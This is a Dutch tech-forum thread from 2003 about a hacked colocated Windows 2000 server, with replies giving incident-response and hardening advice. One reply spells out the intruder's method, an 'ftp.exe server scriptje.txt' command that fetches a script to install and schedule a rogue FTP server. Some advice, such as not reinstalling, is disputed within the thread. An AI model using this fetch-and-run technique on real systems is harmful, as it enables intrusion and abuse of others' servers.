[Win2k server] server gehacked, hoe uit te zoeken waarmee - Windows clients

vrijdag 1 augustus 2003 00:05

Acties:

Verwijderd

Topicstarter

Mijn server is gehacked. Ik heb een colocated windows 2000 advanced server. Deze server staat bij een provider waar de laatste tijd erg veel problemen zijn met DDOS. Waarschijnlijk hebben ze eens goed rondgekeken en mijn servertje gevonden.

Hoe weet ik dat ik gehacked ben? Er wordt echt van alles op mijn systeem gewijzigd:
- allerlei logon gegevens (acces this computer from the network, logo locally etc. worden gewijzigd)
- er wordt steeds een user toegevoegd
- er draaien extra services (een service die timer.exe heet, na nader onderzoek in timer.ini lijkt het een ftp-server, een service die slave.exe heet, dit is een soort PCAnywhere, ik zie nu zelfs servu logs, terwijl ik zeker geen Servu draai, en services als nvsvc, winntmgr.exe)
- de login.cmd is gewijzigd (telnet gebruik, daarin komt de nieuwe gebruikersnaam voor)
en nog wel meer....

Kortom niet fijn

Ik heb de MS Baseline Security Analyzer gedraaid en kom 2 critical updates tegen die niet geinstalleerd zijn:
- Cumulative Patch for Internet Explorer
- Buffer Overrun In HTML Converter Could Allow Code Execution
Ik heb SP4 geinstalleerd, echter dat is volgens mij gedaan nadat ik gehacked ben.

M'n logfiles zijn helaas vanavond gewist.

De server draait normaal een webserver (incl. asp), ftpserver en wordt onderhouden via Terminal Services en soms via VNC over een STunnel.

Wat ik nu graag wil weten is hoe deze persoon binnen is gekomen, iemand een idee hoe ik dit uit kan zoeken?

Ik ga morgen naar de colo om m'n systeem opnieuw te installeren... heb er niet zoveel vertrouwen meer in...:(

vrijdag 1 augustus 2003 09:07

Acties:

mrsar

waar een sar is,is een wodka

tja,het lullige is dus dat ze op allerlei manieren binnengekomen kunnen zijn,mischien hebben ze wel gewoon een password kraak proggie gedraait en had je een te makkelijke pass,noem het maar op,of ze wisten goed met deze om te gaan: Buffer Overrun In HTML Converter Could Allow Code Execution.
tja lullig voor je,en inderdaad je systeem opnieuw installeren,als het bij mij gebeurd zet ik zelfs me ghost nie terug,maar installeer ik em ook opnieuw.
maar zo zie je maar weer waarom je je patches moet bijhouden
kan het btw niet een"vriend" van je zijn die bij jou thuis achter pass/ww is gekomen en leuk gewoon heb ingelogt? je weet maar nooit

steam: mr_sar1 / Battle.net : mrsar#2189 / xbox : mrsar1

vrijdag 1 augustus 2003 09:34

Acties:

Verwijderd

Misschien is Symantec Intruder Alert wat voor je?

Heb je verder wel alle poorten dicht zitten die je niet gebruikt?

vrijdag 1 augustus 2003 10:25

Acties:

collin

Who da man !!

Zoek eens naar de Microsoft Baseline security Guide, is erg handig, daarin staan echt een hoop handige tips, zoals admin shares disablen, moeilijke passwords, renamen admin account, dichtzetten onnodige ports, niet zelf werken met een admin account, maar met run as admin taken verrichten, auditing aanzetten, etc. Misschien heb je er iets aan, in ieder geval succes.

Waarschijnlijk ben je alleen als ftp dump gebruikt, maar een reinstall ontkom je niet aan inderdaad.

Mijn iRacing profiel

vrijdag 1 augustus 2003 10:26

Acties:

mutsje

Certified Prutser

Als je je systeem opnieuw gaat installeren hou dan rekening met het volgende.

Je kunt een heel aantal services die je niet nodig hebt uitschakelen.
Je moet alle extensions in IIS die je NIET nodig hebt verwijderen als htr prt en dergelijke.
Je moet alle default pagina's van IIS verwijderen als default.asp en dergelijke.
kortom je moet je machine compleet strippen.

Ook kun je met policies redelijk veel dicht timmeren op zo'n machine en zet audit ook op een goede manier aan

audit account logon events: succes & failure
audit account management: succes & failure
audit logon events: succes & failure
audit policy change: succes & failure
audit system events: succes & failure

object acces, privilege use en process zou ik niet aanzetten omdat deze de performance nogal kunnen ondermijnen.

object acces activeer je alleen als je bijvoorbeeld een specifieke directory wilt monitoren en reken erop dat je een shitload aan event's gaat krijgen.

op datacrash staat een thread welke extensions je allemaal kunt verwijderen.

vrijdag 1 augustus 2003 10:32

Acties:

Shuriken

Life is all about priorities

Ik zou inderdaad een reinstall doen. Dan weet je tenminste zeker dat je met een goede start begint. En daarna de boel goed aftimmeren zoals Mutsje beschrijft.

I rather have a bottle in front of me, then a frontal lobotomie

vrijdag 1 augustus 2003 10:40

Acties:

Sluuut

Ik begin maar even overnieuw want erg overzichtelijk was mijn post niet

Er zijn 4 standaard-mogelijkheden waarmee je gehacked bent.

1) Netbios
Ook wel NTPass genoemt. Dit werkt op poort 139 of een andere poort die ik even niet uit mn hoofd weet

Hetgeen wat de hacker doet is remote inloggen op jou systeem door middel van een gebruikersnaam/wachtwoord. Meestal is dat de admin zijn schuld omdat diegene bijvoorbeeld Admin/geen password heeft, of Henk als username en ook henk als password. Verander je passwords dus in iets wat niet 1-2-3 te raden is.
Er is een patch voor Windows uitgekomen voor deze 'bug', die staat gewoon tussen je lijstje als je Windows Update draait.

2) SQL
Je draait een SQL Server en hebt geen patches hiervoor geinstalleerd.
De hacked logt in via een exploit en kan doen wat hij wilt... Check de patches hiervoor als je SQL draait.

3) IIS
IIS Windows Webserver. Een enorm groot gat wat ook enorm bekend is bij scriptkiddies. Ze loggen wederom in met een exploit en kunnen doen wat ze willen.
Staat deze server uit en heb je er patches voor geinstalleerd?

4) Een niet bij naam te noemen Exploit
Die op poort 135 werkt. Paar dagen geleden uitgekomen, als je geen firewall draait en niet achter een router zit dan ben je zeer waarchijnlijk vulnerable hiervoor.
Microsoft heeft hier een zeer recente patch voor uitgebracht, RPC genaamd.

Hoe kun je eracher komen door welke van deze 4 je waarschijnlijk gehacked bent?
Ga gewoon na welke service je wel draait en welke niet, welke patches je hebt geinstalleerd en wanneer dat was.

Hoe kom je erachter wie de hacker is?
Bekijk je netwerk logs. Windows Server logt alle gegevens van mensen die op je PC zijn geweest/getracht in te breken. Zo kun je het IP van de hacker achterhalen,
en een Abuse mailtje sturen naar de ISP.

Ga op zoek naar Servu*.*
Je hebt het over Servu die geinstalleerd is zonder dat jij er iets van weet.
Dit heeft de hacker zeer waarschijnlijk gedaan om je als warez punt te gebruiken. Er worden bijvoorbeeld films op je PC geupload die vervolgens door meerdere mensen weer kunnen worden gedownload. Je kunt DUMeter installeren om te bekijken of er bandwidth word gebruikt.
Als je Servudaemon.ini hebt gevonden open deze dan met notepad.
Hier staat bijvoorbeeld in op welke poort je FTP Server loopt en waarschijnlijk de Team-naam van de hackers groep, misschien nog meer informatie.

Oplossing?

1) WindowsUpdate
2) Installeer een firewall! Dit is bijna altijd een goede oplossing tegen hackers.
3) Koop een hardwarematige firewall/router, en configureer deze goed.
4) Installeer een ander OS, Slackware 9 bijvoorbeeld...
5) Je OS opnieuw installeren heeft imo totaal geen zin, dan ben je waarschijnlijk
nog steeds vulnerable.
6) Natuurlijk zijn er nog tientallen andere oplossingen... Gelukkig heb je zelf ook hersenen

Ga dus op zoek naar de FTP Server, delete die, en hou je systeem nauwkeurig in de gaten de komende dagen. Check in MSConfig alle programma's die autoamtisch opstarten, en check tevens je "c:\documents and settings\all users\start menu\programs\startup" op programma's die daar niet thuishoren.

Zo.. dat is wat overzichtelijker

[ Voor 100% gewijzigd door Sluuut op 01-08-2003 11:36 ]

57696520646974206c65657374206973206e657264

vrijdag 1 augustus 2003 11:07

Acties:

Palmboom

http://www.cert.org/tech_...IX-system_compromise.html

vrijdag 1 augustus 2003 13:38

Acties:

collin

Who da man !!

Sluuut schreef op 01 August 2003 een lap text

Mee eens (mooi verhaaltje btw..) maar dat je adviseerd om niet je PC schoon te maken nadat deze gehackt is, vind ik erg raar. Wie weet wat hij allemaal achtergelaten heeft. DDoS tooltjes, weet ik veel, ik zou op zeker reinstallen, mits het niet anders kan natuurlijk (enige DC in een domein ofzo, zonder backup

)

[ Voor 5% gewijzigd door collin op 01-08-2003 13:39 ]

Mijn iRacing profiel

vrijdag 1 augustus 2003 13:43

Acties:

Gé Brander

MS SQL Server

En als het gebeurt is door een wachtwoord te raden met een tool dan heb je je administrator account niet gerenamed. Ook een erg slimme om wel te doen.

Vroeger was alles beter... Geniet dan maar van vandaag, morgen is alles nog slechter!

vrijdag 1 augustus 2003 13:45

Acties:

axis

reinstall.. definitly..

En trouwens, je kan ook een ipSec filter aanmaken, die je gebruikt als portfilter. Is natuurlijk geen echte firewall, maar het zorgt er wel voor dat ook echt alleen de poorten open staan die je nodig hebt.

Two advices for network troubleshooting.. learn to draw diagrams in Visio, and THINK IN LAYERS!

vrijdag 1 augustus 2003 13:50

Acties:

Verwijderd

Ben je mooi klaar mee...

Als het een slimme hacker is heeft 'ie backdoors achter gelaten zodat hij er later weer in kan komen. Je hebt 2 opties:

- Server controleren op alle mogelijke backdoors, tools, users etc.
- Backup alle sites en data op de server en herinstalleer, nu met de juiste updates. (Heeft mijn voorkeur)

vrijdag 1 augustus 2003 13:59

Acties:

regmaster

Beetje eigen schuld dikke bult verhaal dus. Op straat zet je je fiets toch ook op slot? Nou dan. Dus zorg je er ook voor dat je server beveiligd is. Punt.
De meeste (de goede althans) housers bieden tegen redelijke meerkosten het gebruik van hun firewall aan.
Maar de meeste mensen willen voor een dubbeltje op de eerste rang zitten dus moeten ze ook niet zeuren achteraf.
Cracken hoort niet maar gebeurd, net als fietsdiefstal, dus moet je je er van te voren tegen beschermen. Honderd procent is uitgesloten maar hoe moeilijker je ze het maakt des te sneller haken ze af. 9 van de 10 keer zijn het domme scriptkiddies die zonder hun scriptjes niet eens weten hoe ze überhaupt een server moeten benaderen laat staan dat ze begrijpen hoe een tcp stack is opgebouwd.

En dat gezannik over een ander OS nemen moet je maar negeren. Dat is gewoon dom en ongefundeerd geblaat. Elk OS is kwetsbaar als je het niet goed beschermd of er verkeerd mee omgaat.

vrijdag 1 augustus 2003 14:01

Acties:

Verwijderd

DCom draai je mss? die exploit is net nieuw..

vrijdag 1 augustus 2003 14:09

Acties:

VisionMaster

Security!

Verwijderd schreef op 01 August 2003 @ 13:50:
Ben je mooi klaar mee...

Als het een slimme hacker is heeft 'ie backdoors achter gelaten zodat hij er later weer in kan komen. Je hebt 2 opties:

- Server controleren op alle mogelijke backdoors, tools, users etc.
- Backup alle sites en data op de server en herinstalleer, nu met de juiste updates. (Heeft mijn voorkeur)

Als het een webserver / ftpserver is zou ik voor een linux dist gaan als het in je opties past en anders kijken naar Apache for windows als webserver. IIS heeft wat nadeeltje en is een mikpunt van hacker ... helaas ...

Ik ben zelf nooit super dol geweest op MS producten, maar gebruik het altijd. Ik vind het jammer dat hackers zich misdragen op vooral deze OS-en.
Veel suc6 iig

Ik ben het op 1 puntje na helemaal eens met het verhaal van sluuuut (goed en duidelijk verhaal trouwens) Ik zou iig de systeem helemaal cleanen en van ground-up opnieuw installeren ivm de eerder vertelde mogelijkheid op back-doors en andere zaken.

Neem een firewall en blokkeer iig de porten 137 - 138 - 139 En het liefst alles behalve je 80, 21, 5100 (http, ftp, vnc)

Of en nog wat ... gebruik vnc alleen op het hoogste security level, anders gaan je wachtwoorden als plain-text door de lucht.

[ Voor 6% gewijzigd door VisionMaster op 01-08-2003 14:10 ]

I've visited the Mothership @ Cupertino

vrijdag 1 augustus 2003 14:10

Acties:

downtime

Everybody lies

2) Installeer een firewall! Dit is bijna altijd een goede oplossing tegen hackers.
3) Koop een hardwarematige firewall/router, en configureer deze goed.

Goed idee. Een (liefst hardwarematige) firewall gebruiken als first line of defense om alle niet-noodzakelijke toegang tot die machine te blokkeren.

4) Installeer een ander OS, Slackware 9 bijvoorbeeld...

Een slecht idee naar mijn gevoel. Natuurlijk is een "veiliger" OS installeren prima maar alleen als je ook de kennis hebt om die machine te beheren. Zonder kennis van zaken is een onbekend OS juist extra risicovol. Dan maar liever Windows gebruiken als je daar meer kennis van hebt.

5) Je OS opnieuw installeren heeft imo totaal geen zin, dan ben je waarschijnlijk nog steeds vulnerable.

Erg slecht advies. Die machine moet opnieuw geinstalleerd worden omdat je anders nooit 100% zekerheid hebt of je alle "vervuiling" hebt weten te vinden en hebt kunnen verwijderen.
Na herinstallatie ben je misschien nog steeds vulnerable maar je bent in elk geval alle rotzooi kwijt die er niet op hoort. Daarna hoor je alle voorgesteld patches en een firewall te gebruiken om te voorkomen dat die machine opnieuw gehacked wordt.

Zoals al eerder gezegd is het goed om auditing aan te zetten, het admin account te renamen, en vooral complexe (en lange) passwords te gebruiken.

Ik las ook ergens dat je Terminal Server en VNC gebruikt om die machine te beheren. Niet doen! Elk extra programma geeft weer meer mogelijkheden om die machine te hacken. Kies 1 programma en beperk je daartoe.

vrijdag 1 augustus 2003 14:18

Acties:

Sluuut

Ik ben nog steeds van mening dat OS opnieuw installeren niet nodig is.
Maar dat ik zie ik vanuit mijn visie, als ik niet zou weten wat te doen zoals de topicstarten zou ik het ook opnieuw installeren. Ik ben iemand die liever door gaat spitten als iemand me heeft gehacked dan dat ik het OS opnieuw installeer.
Op dat gebied was mijn advies dus wellicht onjuist.

Tevens is het zolang je niemand hebt die jou bak wilt beheren met b.v. Slackware 9.0 of een andere distro, en je weet er zelf weinig vanaf, natuurlijk niet verstandig om dat te installeren. Dan ben je al helemaal ver van huis!
Ik ging er vanuit dat men dat wel zou begrijpen lezenderwijs

PS: Lunchy, vandaag is hij weer up he?

[ Voor 16% gewijzigd door Sluuut op 01-08-2003 14:23 ]

57696520646974206c65657374206973206e657264

vrijdag 1 augustus 2003 14:30

Acties:

Semt-x

voorkomen: Firewall + up2date win2k patches. (ook wel beheren genoemd)
wie deed het?: Het ligt voor de hand om meteen de server te repareren.
Echter wanneer de "hacker" backdoors heeft achter gelaten en geen schade doet aan jouw gegevens zou ik: een sniffer via een hub voor de web server zetten die het passeerde verkeer analiseert. Zon sniffer log combineren met machines gegevens ( filedatums tijden van config files biv van servu ) dan kun je er achterkomen wie schuldig nemer is.
zet geeen extra auditting aan! dit kan de hacker attent maken op jouw acties.

ohja in case u forgot: voer eens beheer uit op je machines, slim om niet te zeggen waar je werkt :]

check met fport.exe ( sysinternals) vooral even op het openstaan van tcp port 890 en 3410
op dit moment zijn dit "populaire" backdoor progs (dsklite en optix)

in case u forgot: voer eens beheer uit op je machines

vrijdag 1 augustus 2003 17:06

Acties:

Verwijderd

Sluuut schreef op 01 August 2003 @ 10:40:
1) Netbios

mag nooit openstaan naar inet... als dit niet geblokt wordt kunnen er altijd pogingen gedaan worden.

2) SQL

in principe moet deze porten ook dicht (1433 1434 default), aangezien alleen de website hoeft te connecten. ik kan me slechts enkele configs voorstellen waar dat niet kan maar dan raad ik aan een andere port te gebruiken.
(als je opnieuw gaat installen en je sql server repliceert niet naar een andere server, zorg er dan voor dat de mssqlserver service onder een normale user account draait (nieuw account laten creeren tijdens install of wijzigen via de enterprise manager). de sqlserver agent moet onder admin of system account draaien (mijn voorkeur heeft system)).

3) IIS

moet wel open anders is je website niet te bereiken... maar alleen de porten openen die nodig zijn (dus niet 80 openen als je alleen https gebruikt)

4) Een niet bij naam te noemen Exploit
Die op poort 135 werkt. Paar dagen geleden uitgekomen, als je geen firewall draait en niet achter een router zit dan ben je zeer waarchijnlijk vulnerable hiervoor.
Microsoft heeft hier een zeer recente patch voor uitgebracht, RPC genaamd.

rpc houdt meer in dan port 135... zoals al gezegd moet alles wat gebruikers vanaf inet niet nodig heeft dichtstaan...

Hoe kun je eracher komen door welke van deze 4 je waarschijnlijk gehacked bent?
Ga gewoon na welke service je wel draait en welke niet, welke patches je hebt geinstalleerd en wanneer dat was.

zeker veel meer mogelijkheden dan deze vier (netstat -an)... misschien zelfs wel "gehacked" door een vaag proggie te installen, omdat dat zo makkelijk werkt, maar ondertussen een trojan bevat...

Oplossing?
1) WindowsUpdate
2) Installeer een firewall! Dit is bijna altijd een goede oplossing tegen hackers.
3) Koop een hardwarematige firewall/router, en configureer deze goed.
4) Installeer een ander OS, Slackware 9 bijvoorbeeld...
5) Je OS opnieuw installeren heeft imo totaal geen zin, dan ben je waarschijnlijk
nog steeds vulnerable.
6) Natuurlijk zijn er nog tientallen andere oplossingen... Gelukkig heb je zelf ook hersenen

Ga dus op zoek naar de FTP Server, delete die, en hou je systeem nauwkeurig in de gaten de komende dagen. Check in MSConfig alle programma's die autoamtisch opstarten, en check tevens je "c:\documents and settings\all users\start menu\programs\startup" op programma's die daar niet thuishoren.

1. agree. maar alleen relevante patches nodig... weet je niet wat relevant is, dan moet je geen webserver opzetten

2. bull, nummer 3 dekt dit af en is zowieso een veel betere oplossing
4. yeah right... os heeft er weinig mee te maken... config is alles... en je maakt mij niet wijs dat een noob op slackware 9 gebied het safer maakt dan whatever hij wel kent...
5. opnieuw installeren moet zeker... als de server gedurende een langere periode misbruikt is weet je nooit zeker of alles weg is... als je installeert en sp4 erop zet voordat je een verbinding hebt met inet, zit het wel goed... daarna de overige patches installen...

verder nog een tip die ik nog niet gezien heb (echter wel vergelijkbaar met mutsje's application mappings verwijderen...) urlscan installeren

edit: nog een tip voor beheer... gebruik gewoon terminal server. dit is volledig geencrypt. ik zou wel de port wijzigen en niet de default 3389 gebruiken en/of restrict toegang op die port op basis van ipnummers.

verder ftp nooit met een admin account!!!

[ Voor 8% gewijzigd door Verwijderd op 01-08-2003 17:28 ]

vrijdag 1 augustus 2003 19:13

Acties:

Verwijderd

Topicstarter

Thanx voor de replies...

Ik kom net terug van een dagje uit de colo. Ik heb de server geheel opnieuw geinstalleerd. En alle mogelijke patches en updates uitgevoerd... (veel al zonder internetconnectie)

Even reactie op wat tips...
- beheer je bak (e.d.)
Ik heb redelijk wat servers beheerd, op dit moment 2 servers: 1 win2k en 1 linux (debian), ik heb de windows functionaliteit nodig vandaar dat ik ook een windows bak heb. Het rare en nare vind ik dat ik altijd redelijk bij ben (maar dus nu duidelijk niet genoeg bij ben geweest).

Op de server had ik al het volgende gedaan:
- admin account hernoemd
- alle onnodige services uitstaan
- netbios connecties uit
- shares weg
- urlscan draaiend
- BaseLine Security Advisor gedraaid (alleen dus niet de laatste weken)
- alle IIS mogelijkheden behalve html en asp uit
- de hierboven beschreven audit's aan (maar die waren dus gedelete

)
- en het wachtwoord verhaal Henk/henk (zoooo dom ben ik nou ook niet

)

Kortom naar mijn mening niet zo maar een servertje neergezet, vandaar dat ik er ook echt wel van baal

.

Ik heb op een NT 4 machine ooit met ipSec filters gewerkt, en dat ga ik nu maar weer doen, het is een flink werkje maar werkt wel erg goed...

Even over de wel of niet installeren discussie, ik heb gezien wat een hoeveelheid aan programma's er neer gekwakt werden echt niet fijn, op het moment dat je niet opnieuw installeerd weet je nooit zeker of er ergens nog een gewijzigde versie van een programma of een extra programma staat, ik zou dus altijd opnieuw installeren.

Ik heb een kopie gemaakt van de schijf dus kan op m'n gemak nog eens gaan kijken of ik ergens nog iets kan vinden, en anders komt deze hacker er makkelijk vanaf. Het online zijn was voor mij even belangrijker...

vrijdag 1 augustus 2003 19:19

Acties:

BasieP

Sluuut schreef op 01 augustus 2003 @ 10:40:
Ik begin maar even overnieuw want erg overzichtelijk was mijn post niet

Er zijn 4 standaard-mogelijkheden waarmee je gehacked bent.

1) Netbios
Ook wel NTPass genoemt. Dit werkt op poort 139 of een andere poort die ik even niet uit mn hoofd weet
Hetgeen wat de hacker doet is remote inloggen op jou systeem door middel van een gebruikersnaam/wachtwoord. Meestal is dat de admin zijn schuld omdat diegene bijvoorbeeld Admin/geen password heeft, of Henk als username en ook henk als password. Verander je passwords dus in iets wat niet 1-2-3 te raden is.
Er is een patch voor Windows uitgekomen voor deze 'bug', die staat gewoon tussen je lijstje als je Windows Update draait.

2) SQL
Je draait een SQL Server en hebt geen patches hiervoor geinstalleerd.
De hacked logt in via een exploit en kan doen wat hij wilt... Check de patches hiervoor als je SQL draait.

3) IIS
IIS Windows Webserver. Een enorm groot gat wat ook enorm bekend is bij scriptkiddies. Ze loggen wederom in met een exploit en kunnen doen wat ze willen.
Staat deze server uit en heb je er patches voor geinstalleerd?

4) Een niet bij naam te noemen Exploit
Die op poort 135 werkt. Paar dagen geleden uitgekomen, als je geen firewall draait en niet achter een router zit dan ben je zeer waarchijnlijk vulnerable hiervoor.
Microsoft heeft hier een zeer recente patch voor uitgebracht, RPC genaamd.

goede post maar mag ik er even op aanmerken dat dit beetje incompleet is.. ten eerste noem je maar 4 mogenlijkheden, maar ik kan d'r zo al een aantal meer opnoemen (die ik niet ga noemen om dezelfde reden dat jij puntje 4 niet noemde)

verder zeg je 'sql' maar dat moet 'Mircosoft SQL server zijn... (of MS-SQL)
en zo nog een aantal dingen

de topicstarter zou ons best mogen vertellen WELKE servers hij draait (dus welke versie van IIS (als ie iis draait) of apache, of welke sql server, etc. etc.

om heel eerlijk te zijn wordt het anders gokken voor ons.

en ik moet zeggen, dat op mijn vorige stage de systeembeheerder zei:

als je ooit een windows server MOET bouwen, zet er dan nooit Mircosoft services op, maar doe het altijd met externe software

hier bedoelde hij dus apache, guildftp/bulletproof, mysql/oracle mee ipv de door ms aangeleverde dingen..

ik wil nu trouwens niet al te veel afgeven op ms, maar het is toch wel redelijk bekent dat veel services een beetje lek zijn, (zelfs met de daarvoor bestemde updates)

[ Voor 31% gewijzigd door BasieP op 01-08-2003 19:22 ]

This message was sent on 100% recyclable electrons.

vrijdag 1 augustus 2003 19:58

Acties:

Kama

Game Coordinator

Mijn W2k Server is ook al eens gehacked. Ik weet inmiddels hoe die slimkezen het doen (lees: het bij mij gedaan hebben). Zie ook: [W2KServer] Gehacked... Wat nu...

SQL Server is vulnerable. Dat is niet zo'n probleem, zolang je em maar niet op de TCP/IP interface laat werken. Dat moet je dus uitschakelen. Beter is om beheer te doen via piped names (of was het nou named pipes?) via bijv. VPN of VNC.

Door bepaalde aanvallen is het mogelijk voor de aanvaller om een DOS-commando uit te voeren. Het commando dat men runt is sim-pel, "ftp.exe server scriptje.txt"... Men haalt met ftp een scriptje op en vervolgens haalt dat scriptje een kant-en-klare FTP configuratie op. De laatste stap is die FTP server schedulen via scheduled task, of een service oid. En voila... Een gehackte FTP server.

Tip: Verwijder FTP.EXE van je schijf, of rename het. Belangrijk is om het ook uit de cache te verwijderen (anders staat ftp.exe er binnen een seconde of wat weer) (c:\winnt\system32\dllcache zo uit m'n hoofd).

Deze twee zaken zijn de bron van de meeste populaire hacks... Zover mijn ervaring.

Ik hoop dat je ISP schappelijk is mbt je verbruikte bandbreedte

drs. Kama

vrijdag 1 augustus 2003 20:01

Acties:

axis

het lastige is volgens mij in routing en remote access dat dit inderdaad nogal een omslachtig kwarweitje is..

een ipsec filter download ik zo kant en klaar van een van mijn andere servers, hoppa, import, assignen, en dan nog even wat finetunen. Klaar. In letterlijk maximaal 5 minuten te doen.

Two advices for network troubleshooting.. learn to draw diagrams in Visio, and THINK IN LAYERS!

vrijdag 1 augustus 2003 20:08

Acties:

bop

VisualWeb

staat hij toevallig bij het altijd online IO

?

doe niet aan signatures.. uhhh, arghhh

vrijdag 1 augustus 2003 23:06

Acties:

Verwijderd

Topicstarter

Flesh: heb je me vandaag zien zitten dan?

Ja dus, tot een paar weken terug was ik redelijk tevreden, maar de laatste weken is het echt prut... en ik heb het gevoel dat het hackers aantrekt... al die ddos attacks die zijn geweest...

zondag 3 augustus 2003 17:54

Acties:

Sluuut

[quote]BasieP schreef op 01 augustus 2003 @ 19:19:
[...]

goede post maar mag ik er even op aanmerken dat dit beetje incompleet is.. ten eerste noem je maar 4 mogenlijkheden, maar ik kan d'r zo al een aantal meer opnoemen (die ik niet ga noemen om dezelfde reden dat jij puntje 4 niet noemde)

verder zeg je 'sql' maar dat moet 'Mircosoft SQL server zijn... (of MS-SQL)
en zo nog een aantal dingen
[quote]

Ik heb toch aangegeven dat dit de 4 meest gebruikelijke exploits zijn die worden gebruikt momenteel? Natuurlijk zijn er meerdere mogelijkheden, ga jij ze maar lekker alle miljoen opschrijven.

'sql' Het spijt me dat ik geen perfectionist ben [not], jij gaat toch ook geen File Transfer Protocol schrijven ipv FTP. Iedereen op t.net begrijpt wel wat 'sql' betekend. Zo niet dan vraagt diegene dat maar, maar ga er niet bij mij over zaniken als je zelf allang weet wat het betekend.

TopicStarter:

Ben je er nog achter gekomen welke exploit het was, en welk ip/naam van de hacker? Of heb je gewoon gelijk format gedaan en OS re-install?

[ Voor 51% gewijzigd door Sluuut op 03-08-2003 17:59 ]

57696520646974206c65657374206973206e657264

zondag 3 augustus 2003 18:45

Acties:

NoBody

www.gentoo.org

even het mooie freeware tooltje genaamd "TCPView" downloaden en draaien op je machine, hier kan je hem vinden

Dit tooltje laat precies zien welke poorten gebruikt worden en op welke poorten geluisterd wordt, en door welk proces (bestandsnaam, bijv. mirc.exe)...

plaats eventueel een screenshot als je niet zeker weet of een bepaald proces standaard is of dat het iets is dat je niet wilt

succes

regmaster schreef op 01 August 2003 @ 13:59:
Beetje eigen schuld dikke bult verhaal dus. Op straat zet je je fiets toch ook op slot? Nou dan. Dus zorg je er ook voor dat je server beveiligd is. Punt.
De meeste (de goede althans) housers bieden tegen redelijke meerkosten het gebruik van hun firewall aan.
Maar de meeste mensen willen voor een dubbeltje op de eerste rang zitten dus moeten ze ook niet zeuren achteraf.
Cracken hoort niet maar gebeurd, net als fietsdiefstal, dus moet je je er van te voren tegen beschermen. Honderd procent is uitgesloten maar hoe moeilijker je ze het maakt des te sneller haken ze af. 9 van de 10 keer zijn het domme scriptkiddies die zonder hun scriptjes niet eens weten hoe ze überhaupt een server moeten benaderen laat staan dat ze begrijpen hoe een tcp stack is opgebouwd.

hoe krijg je het in je hoofd om het slachtoffer aan te vallen, niet hij is degene die iets doet wat niet hoort, de hacker is diegene die iets doet wat niet hoort... het gebeurt maar al te vaak dat men het slachtoffer aanvalt op alle punten ipv de dief/hacker/aanrander/noem-maar-op, waarom denk je anders dat de regering altijd zo soft is tegen criminelen, die redeneren namelijk net zo

beetje offtopic maar dat wilde ik nog wel even kwijt

[ Voor 59% gewijzigd door NoBody op 03-08-2003 18:49 ]

Hoi

maandag 4 augustus 2003 08:24

Acties:

mutsje

Certified Prutser

sta je nu al achter een firewall dan? Want je kunt een Windows 2000 server wel helemaal dicht gaan timmeren een firewall ervoor zou ook bijzonder fijn zijn. Ook raad ik je aan SMB service volledig te verwijderen als het alleen een IIS machine betreft. Dit doe je niet door simpelweg hier en daar vinkje te zetten (lees security guide windows 2000 server hiervoor maar). Hierin staat ook precies welk services wel /niet aan moeten/mogen etc. Verder kun je ook de templates eens bekijken en eventueel erover heen donderen deze zet gelijk heel aantal services al dicht en nog meer.

maandag 4 augustus 2003 09:14

Acties:

luc

Verwijderd schreef op 01 August 2003 @ 23:06:
Flesh: heb je me vandaag zien zitten dan?

Hmmm ik wel, nog bedankt voor die schroevendraaier

maandag 4 augustus 2003 11:19

Acties:

Verwijderd

Verwijderd schreef op 01 August 2003 @ 23:06:
Flesh: heb je me vandaag zien zitten dan?

Ja dus, tot een paar weken terug was ik redelijk tevreden, maar de laatste weken is het echt prut... en ik heb het gevoel dat het hackers aantrekt... al die ddos attacks die zijn geweest...

was het niet gewoon gebruik van het ftp servertje, die je lijn dichtslipte?

maandag 4 augustus 2003 12:05

Acties:

Verwijderd

Hee Jacco, gaat niet zo goed dus?

Jouw server is dus de afgelopen weken gebruikt als FTP site voor warez/apps/pr0n etc. een zogehete 'pub'

Dat was dus geen DDOS, maar jouw FTP site waar 100 mensen van zitten te downloaden.

het is waarschijnlijk begonnen omdat op 1 van je FTP sites de NTFS rechten niet goed stonden, zodat anonieme gebruikers ook schrijfrechten hadden. zodoende kon er troep geupload worden, en er zijn altijd trucjes om dat te executen.

tenminste, dat denk ik. loop vooral dus je NTFS rechten na.

(Alex)

[ Voor 13% gewijzigd door Verwijderd op 04-08-2003 12:06 ]

maandag 4 augustus 2003 14:34

Acties:

amahusu

taking over the world!

kleine maar effectieve tip:

rename of verwijder je ftp.exe en tftp.exe (tftpd.exe) in je winnt\system32\ dir. Zo kunnen hackers iig geen files naar je uploaden, waarmee het gedonder altijd begint.

ps. check ook je winnt\system32\dllcache\ dir want daar staat vaak nog een copy van ftp.exe en/of tftp.exe

Always Outnumbered, Never Outgunned // Some people feel the rain, others just get wet

maandag 4 augustus 2003 14:52

Acties:

Verwijderd

ik zie niet waarom ftp.exe verwijderd moet worden... dat is client proggy en heeft niets te maken met iis-ftp.

maandag 4 augustus 2003 14:55

Acties:

amahusu

taking over the world!

Verwijderd schreef op 04 August 2003 @ 14:52:
ik zie niet waarom ftp.exe verwijderd moet worden... dat is client proggy en heeft niets te maken met iis-ftp.

omdat iemand die zich toegang heeft verschaft tot jouw systeem dan alle tools die ie nodig heeft kan uploaden naar je server

[ Voor 15% gewijzigd door amahusu op 04-08-2003 14:56 ]

Always Outnumbered, Never Outgunned // Some people feel the rain, others just get wet

maandag 4 augustus 2003 14:59

Acties:

Verwijderd

Uhm. laten we dan ook gelijk inetinfo.exe verwijderen, want IIS kan ook gebruikt worden voor aanvallen van hackers...

maandag 4 augustus 2003 15:05

Acties:

Verwijderd

amahusu schreef op 04 August 2003 @ 14:55:
[...]

omdat iemand die zich toegang heeft verschaft tot jouw systeem dan alle tools die ie nodig heeft kan uploaden naar je server

als die toegang kan krijgen, kan die de tools ook wel op een andere manier krijgen...

[ Voor 4% gewijzigd door Verwijderd op 04-08-2003 15:07 ]

maandag 4 augustus 2003 15:06

Acties:

amahusu

taking over the world!

laat maar, blijkbaar is de kennis van nt exploiting gering hier op got, nofi

[ Voor 168% gewijzigd door amahusu op 04-08-2003 15:08 ]

Always Outnumbered, Never Outgunned // Some people feel the rain, others just get wet

maandag 4 augustus 2003 15:10

Acties:

Verwijderd

amahusu schreef op 04 August 2003 @ 15:06:
laat maar, blijkbaar is de kennis van nt exploiting gering hier op got, nofi

Dan moet je ook Internet Explorer eraf gooien, want dat is ook een ftp-client

maandag 4 augustus 2003 15:22

Acties:

TAMW

Verwijderd schreef op 04 August 2003 @ 14:52:
ik zie niet waarom ftp.exe verwijderd moet worden... dat is client proggy en heeft niets te maken met iis-ftp.

